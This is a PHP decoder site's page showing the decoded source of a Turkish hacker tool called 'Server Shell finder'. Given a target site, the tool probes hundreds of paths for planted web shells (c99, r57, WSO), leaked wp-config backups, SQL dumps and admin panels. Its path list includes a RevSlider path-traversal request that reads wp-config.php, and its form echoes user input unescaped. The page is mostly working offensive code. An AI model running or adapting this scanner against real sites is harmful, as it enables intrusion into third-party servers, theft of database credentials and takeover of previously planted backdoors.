Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
/* Decoded by unphp.net */ <?php echo '</head> <body> <body style="background-ima..
Decoded Output download
</head>
<body>
<body style="background-image: url('http://f1301.hizliresim.com/15/p/j5k6y.jpg'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
<center>
<br/>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Server Shell finder The-xatlivacip</title>
<style type="text/css">
body{
background: #000;
margin: 0;
padding: 0;
padding-top: 10px;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 998px;
border: 1px solid #e52224;
background: #191919;
color: #e52224
}
.red input{
background: #000;
border: 1px solid #e52224;
color: #FFF;
}
.blue{
float: left;
width: 1000px;
border: 1px solid #1d7fc3;
background: #191919;
color: #1d7fc3;
}
.green{
float: left;
width: 1000px;
border: 1px solid #5fd419;
background: #191919;
color: #5fd419;
}
</style>
<script type="text/javascript">
<!--
function insertcode($text, $place, $replace)
{
var $this = $text;
var logbox = document.getElementById($place);
if($replace == 0)
document.getElementById($place).innerHTML = logbox.innerHTML+$this;
else
document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
</head>
<body>
<br />
<br />
<div class="wrapper">
<div class="red">
<div class="tube">
<form action="" method="post" name="xploit_form">
TARANACAK URL:<br /><input type="text" name="xploit_url" value="None" style="width: 100%;" /><br /><br />
<span style="float: right;"><input type="submit" name="xploit_submit" value="Shell Tara knk" align="right" /></span>
</form>
<br />
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Toplam Taranan: <span id="verified">0</span> / <span id="total">0</span><br />
Bulunan:<br />
</div> <!-- /tube -->
</div> <!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br /><center><font color="#0033FF">
<pre><center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:red"><font
color=red>#Marc0 Priv8 2013 Server Shell finder The-xatlivacip [v0.1] <---- ajanlar.org # m4rc0-security.blogspot.com/#</pre>
<hr>
<br />
<br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">Did this file decode correctly?
Original Code
/* Decoded by unphp.net */
<?php echo '</head>
<body>
<body style="background-image: url(\'http://f1301.hizliresim.com/15/p/j5k6y.jpg\'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
<center>
<br/>
';
set_time_limit(0);
error_reporting(0);
$list['front'] = "admin
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$list['end'] = "admin1.php
web1.php
root.php
wp-config.txt
wp-config.php~
wp-config.bak
wp-config.phpBak
wp-config.php-bak
wp-config.save
wp-config.back
wp-config.old
wp-config.html
wp-config.txt
web.root
izo.cin
/python/
code.php
r0t.php
up.php
up1.php
up2.php
up3.php
uploader.php
upload.php
yukle.php
upl04d3r.php
upload3.php
c0d3.php
sh3ll.php
asd.php
123.php
a.php
rec.php
koyz.php
koy.php
d4.php
kommand.php
kommant.php
command.php
red.php
/wp-includes/SimplePie/theme-options.php
recovers.php
recovery.php
/inc/config.txt
/inc/config.php
sym.php
symroot.php
symlinkuser.php
it.php
config.txt
izo.cin
webr00t.php
web.php
angel.php
/redirect-to/?redirect=http://pagebin.com/JopKidzK
/node/1/edit
/node/2/edit
/node/3/edit
/node/4/edit
/node/5/edit
/node/6/edit
/node/7/edit
/node/8/edit
/node/9/edit
/node/10/edit
/node/11/edit
/node/12/edit
/node/13/edit
/node/14/edit
/node/15/edit
/node/16/edit
/node/17/edit
/node/18/edit
/node/19/edit
/node/20/edit
/node/21/edit
/node/22/edit
/node/23/edit
/node/24/edit
/node/25/edit
/node/26/edit
/node/27/edit
/node/28/edit
/node/29/edit
/node/30/edit
/node/31/edit
options.php
locale.php
WSO.php
dz.php
w.php
/wp-content/plugins/akismet/akismet.php
images/stories/w.php
w.php
/sym/
/configweb/
/symlinkuser/
anon.php
shell.php
madspot.php
Cgishell.pl
killer.php
changeall.php
2.php
Sh3ll.php
dz0.php
dam.php
user.php
dom.php
whmcs.php
r00t.php
1.php
a.php
r0k.php
abc.php
egy.php
syrian_shell.php
xxx.php
settings.php
tmp.php
cyber.php
c99.php
r57.php
404.php
gaza.php
1.php
d4rk.php
index1.php
nkr.php
xd.php
M4r0c.php
Dz.php
sniper.php
ksa.php
v4team.php
offline.php
priv8.php
911.php
madspotshell.php
c100.php
sym.php
cp.php
tmp/cpn.php
tmp/w.php
tmp/r57.php
tmp/king.php
tmp/sok.php
tmp/ss.php
tmp/as.php
tmp/dz.php
tmp/r1z.php
tmp/whmcs.php
tmp/root.php
tmp/r00t.php
templates/beez/index.php
/wp-content/plugins/disqus-comment-system/mysql.php
/wp-content/plugins/disqus-comment-system/WolF.php
/wp-content/plugins/disqus-comment-system/madspot.php
/wp-content/plugins/disqus-comment-system/Cgishell.pl
/wp-content/plugins/disqus-comment-system/killer.php
/wp-content/plugins/disqus-comment-system/changeall.php
/wp-content/plugins/disqus-comment-system/sa.php
/wp-content/plugins/disqus-comment-system/sysadmins/
/wp-content/plugins/disqus-comment-system/admin1/
/wp-content/plugins/disqus-comment-system/sniper.php
/wp-content/plugins/disqus-comment-system/images/Sym.php
/wp-content/plugins/disqus-comment-system//r57.php
/wp-content/plugins/disqus-comment-system/gzaa_spysl
/wp-content/plugins/disqus-comment-system/sql-new.php
/wp-content/plugins/disqus-comment-system//shell.php
/wp-content/plugins/disqus-comment-system//sa.php
/wp-content/plugins/disqus-comment-system//admin.php
/wp-content/plugins/akismet/ssl.php
/wp-content/plugins/akismet/mysql.php
/wp-content/plugins/akismet/WolF.php
/wp-content/plugins/akismet/madspot.php
/wp-content/plugins/akismet/Cgishell.pl
/wp-content/plugins/akismet/killer.php
/wp-content/plugins/akismet/changeall.php
/wp-content/plugins/akismet//sa2.php
/wp-content/plugins/google-sitemap-generator/r00t-s3c.php
/wp-content/plugins/google-sitemap-generator/c.php
/wp-content/plugins/google-sitemap-generator//backup.sql
/wp-content/plugins/google-sitemap-generator//back.sql
/wp-content/plugins/google-sitemap-generator//data.sql
/templates/beez/user.php
/templates/beez/dom.php
/templates/beez/whmcs.php
/templates/beez/vb.zip
/templates/beez/r00t.php
/templates/beez/c99.php
/templates/beez/gaza.php
/templates/beez/1.php
/images/Sym.php
/images/c22.php
/images/c100.php
/images/configuration.php
/images/g.php
/images/xx.pl
/images/ls.php
/images/Cpanel.php
/images/k.php
/images/zone-h.php
/images/tmp/user.php
/images/tmp/Sym.php
/images/cp.php
/images/tmp/madspotshell.php
/images/tmp/root.php
/images/tmp/whmcs.php
/images/tmp/index.php
/images/tmp/2.php
/images/tmp/dz.php
/images/tmp/cpn.php
/images/tmp/changeall.php
/images/tmp/Cgishell.pl
/images/tmp/sql.php
/images/up.php
/images/vb.zip
/images/vb.rar
/images/admin2.asp
/images/uploads.php
/images/sa.php
/images/sysadmins/
/images/admin1/
/images/sniper.php
/images/images/Sym.php
/images//r57.php
/images/gzaa_spysl
/images/sql-new.php
/images//shell.php
/images//sa.php
/images//admin.php
/images//sa2.php
/images//2.php
/images//gaza.php
/images//up.php
/images//upload.php
/images//uploads.php
/images/shell.php
/images//amad.php
/images//t00.php
/images//dz.php
/images//site.rar
/images//Black.php
/images//site.tar.gz
/images//error_log
/images//error
/images//cpanel
/images//awstats
/images//site.sql
/images//vb.sql
/images//forum.sql
/images/r00t-s3c.php
/images/c.php
/images//backup.sql
/images//back.sql
/images//data.sql
/images/wp.rar/
/images/asp.aspx
/images/tmp/vaga.php
/images/tmp/killer.php
/images/whmcs.php
/images/abuhlail.php
/images/X.php
/images/123.php
/images/m.php
/images/b.php
/images/up.php
/images/tmp/dz1.php
/images/dz1.php
/images/forum.zip
/images/Symlink.php
/images/Symlink.pl
/images/forum.rar
/images/joomla.zip
/images/joomla.rar
/images/wp.php
/images/buck.sql
/includes/WSO.php
/includes/dz.php
/includes/DZ.php
/includes/cpanel.php
/includes/cpn.php
/includes/sos.php
/includes/term.php
/includes/Sec-War.php
/includes/sql.php
/includes/ssl.php
/includes/mysql.php
/includes/WolF.php
/includes/madspot.php
/includes/Cgishell.pl
/includes/killer.php
/includes/changeall.php
/includes/2.php
/includes/Sh3ll.php
/includes/dz0.php
/includes/dam.php
/includes/user.php
/includes/dom.php
/includes/whmcs.php
/includes/vb.zip
/includes/r00t.php
/includes/c99.php
/includes/gaza.php
/includes/1.php
/includes/d0mains.php
/includes/madspotshell.php
/includes/info.php
/includes/egyshell.php
/includes/Sym.php
/includes/c22.php
/includes/c100.php
/includes/configuration.php
/includes/g.php
/includes/xx.pl
/includes/ls.php
/includes/Cpanel.php
/includes/k.php
/includes/zone-h.php
/includes/tmp/user.php
/includes/tmp/Sym.php
/includes/cp.php
/includes/tmp/madspotshell.php
/includes/tmp/root.php
/includes/tmp/whmcs.php
/includes/tmp/index.php
/includes/tmp/2.php
/includes/tmp/dz.php
/includes/tmp/cpn.php
/includes/tmp/changeall.php
/includes/tmp/Cgishell.pl
/includes/tmp/sql.php
/includes/0day.php
/includes/tmp/admin.php
/includes/L3b.php
/includes/d.php
/includes/tmp/d.php
/includes/tmp/L3b.php
/includes/sado.php
/includes/admin1.php
/includes/upload.php
/includes/up.php
/includes/vb.zip
/includes/vb.rar
/includes/admin2.asp
/includes/uploads.php
/includes/sa.php
/includes/sysadmins/
/templates/rhuk_milkyway/tmp/d.php
/templates/rhuk_milkyway/tmp/L3b.php
/templates/rhuk_milkyway/sado.php
/templates/rhuk_milkyway/admin1.php
/templates/rhuk_milkyway/upload.php
/templates/rhuk_milkyway/
WSO.php
a.php
z.php
e.php
r.php
t.php
y.php
u.php
i.php
o.php
p.php
q.php
s.php
d.php
f.php
g.php
h.php
j.php
k.php
l.php
m.php
w.php
x.php
c.php
v.php
b.php
n.php
1.php
2.php
3.php
4.php
5.php
6.php
7.php
8.php
9.php
10.php
12.php
11.php
1234.php
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
login.htm
login.html
admin.htm
admin.html
yonetim.asp
yonetim.php
giris.php
login.asp
wp-login
wp-login.php
/admin/
/login
/panel/
/yonetim/
/giris/
UserLogin
login.php
admin.php
admin.asp
admin.html
administrator.php
administrator.asp
admincp
admin/login.php
admin/login.asp gibidir.
faa_tools/login.php?prev_page=/faa_tools/
/wseltzer/Antitrust
/training/compendium/administer/admintrainingevents.aspx
sh3ll.php
ssh.php
ps/ps.php
templates/undp_2/index.php
templates/undp_2/r57.php
templates/undp_2/c99.php
templates/undp_2/c100.php
templates/undp/r00t.php
templates/undp/sym.php
templates/undp/wsob.php
templates/undp/web1.php
templates/undp/cgiweb
/templates/beez/shell.php
/templates/beez/r57.php
/templates/beez/c99.php
/templates/beez/c100.php
/templates/beez/safe.php
/templates/beez/bypass.php
/templates/beez/r00t.php
/templates/beez/sym.php
/templates/beez/cgiweb
/templates/shell.php
/templates/r57.php
/templates/c99.php
/templates/c100.php
/templates/sym.php
/templates/cgiweb
cache/
cgishell
cgiweb
/admin/anket.php
domain.php
dom.php
python
templates/beez/cgirun
templates/beez/configler
templates/beez/cgitelnet1
sym
sym.php
wsob.php
r00t.php
cgiweb/";
function template() {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Server Shell finder The-xatlivacip</title>
<style type="text/css">
body{
background: #000;
margin: 0;
padding: 0;
padding-top: 10px;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 998px;
border: 1px solid #e52224;
background: #191919;
color: #e52224
}
.red input{
background: #000;
border: 1px solid #e52224;
color: #FFF;
}
.blue{
float: left;
width: 1000px;
border: 1px solid #1d7fc3;
background: #191919;
color: #1d7fc3;
}
.green{
float: left;
width: 1000px;
border: 1px solid #5fd419;
background: #191919;
color: #5fd419;
}
</style>
<script type="text/javascript">
<!--
function insertcode($text, $place, $replace)
{
var $this = $text;
var logbox = document.getElementById($place);
if($replace == 0)
document.getElementById($place).innerHTML = logbox.innerHTML+$this;
else
document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
</head>
<body>
<br />
<br />
<div class="wrapper">
<div class="red">
<div class="tube">
<form action="" method="post" name="xploit_form">
TARANACAK URL:<br /><input type="text" name="xploit_url" value="' . $_POST['xploit_url'] . '" style="width: 100%;" /><br /><br />
<span style="float: right;"><input type="submit" name="xploit_submit" value="Shell Tara knk" align="right" /></span>
</form>
<br />
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Toplam Taranan: <span id="verified">0</span> / <span id="total">0</span><br />
Bulunan:<br />
</div> <!-- /tube -->
</div> <!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br /><center><font color="#0033FF">
<pre><center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:red"><font
color=red>#Marc0 Priv8 2013 Server Shell finder The-xatlivacip [v0.1] <---- ajanlar.org # m4rc0-security.blogspot.com/#</pre>
<hr>
<br />
<br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">';
}
function show($msg, $br = 1, $stop = 0, $place = 'logbox', $replace = 0) {
if ($br == 1) $msg.= "<br />";
echo "<script type=\"text/javascript\">insertcode('" . $msg . "', '" . $place . "', '" . $replace . "');</script>";
if ($stop == 1) exit;
@flush();
@ob_flush();
}
function check($x, $front = 0) {
global $_POST, $site, $false;
if ($front == 0) $t = $site . $x;
else $t = 'http://' . $x . '.' . $site . '/';
$headers = get_headers($t);
if (!eregi('200', $headers[0])) return 0;
$data = @file_get_contents($t);
if ($_POST['xploit_404string'] == "") if ($data == $false) return 0;
if ($_POST['xploit_404string'] != "") if (strpos($data, $_POST['xploit_404string'])) return 0;
return 1;
}
template();
if (!isset($_POST['xploit_url'])) die;
if ($_POST['xploit_url'] == '') die;
$site = $_POST['xploit_url'];
if ($site[strlen($site) - 1] != "/") $site.= "/";
if ($_POST['xploit_404string'] == "") $false = @file_get_contents($site . "d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
$list['end'] = str_replace("
", "", $list['end']);
$list['front'] = str_replace("
", "", $list['front']);
$pathes = explode("
", $list['end']);
$frontpathes = explode("
", $list['front']);
show(count($pathes) + count($frontpathes), 1, 0, 'total', 1);
$verificate = 0;
foreach ($pathes as $path) {
show('Tarıyorum reis ' . $site . $path . ' : ', 0, 0, 'logbox', 0);
$verificate++;
show($verificate, 0, 0, 'verified', 1);
if (check($path) == 0) show('Bulunamadı :(', 1, 0, 'logbox', 0);
else {
show('<span style="color: #00FF00;"><strong>Buldu</strong></span>', 1, 0, 'logbox', 0);
show('<a href="' . $site . $path . '">' . $site . $path . '</a>', 1, 0, 'rightcol', 0);
}
}
preg_match("/\/\/(.*?)\//i", $site, $xx);
$site = $xx[1];
if (substr($site, 0, 3) == "www") $site = substr($site, 4);
foreach ($frontpathes as $frontpath) {
show('Tarıyorum reis http://' . $frontpath . '.' . $site . '/ : ', 0, 0, 'logbox', 0);
$verificate++;
show($verificate, 0, 0, 'verified', 1);
if (check($frontpath, 1) == 0) show('Bulunamadı :(', 1, 0, 'logbox', 0);
else {
show('<span style="color: #00FF00;"><strong>Buldu</strong></span>', 1, 0, 'logbox', 0);
show('<a href="http://' . $frontpath . '.' . $site . '/">' . $frontpath . '.' . $site . '</a>', 1, 0, 'rightcol', 0);
}
};
echo '
';
Function Calls
| strlen | 1 |
| template | 1 |
| set_time_limit | 1 |
| error_reporting | 1 |
Stats
| MD5 | 267ab11a6b90eeed2d3b77ffab985d5e |
| Eval Count | 0 |
| Decode Time | 146 ms |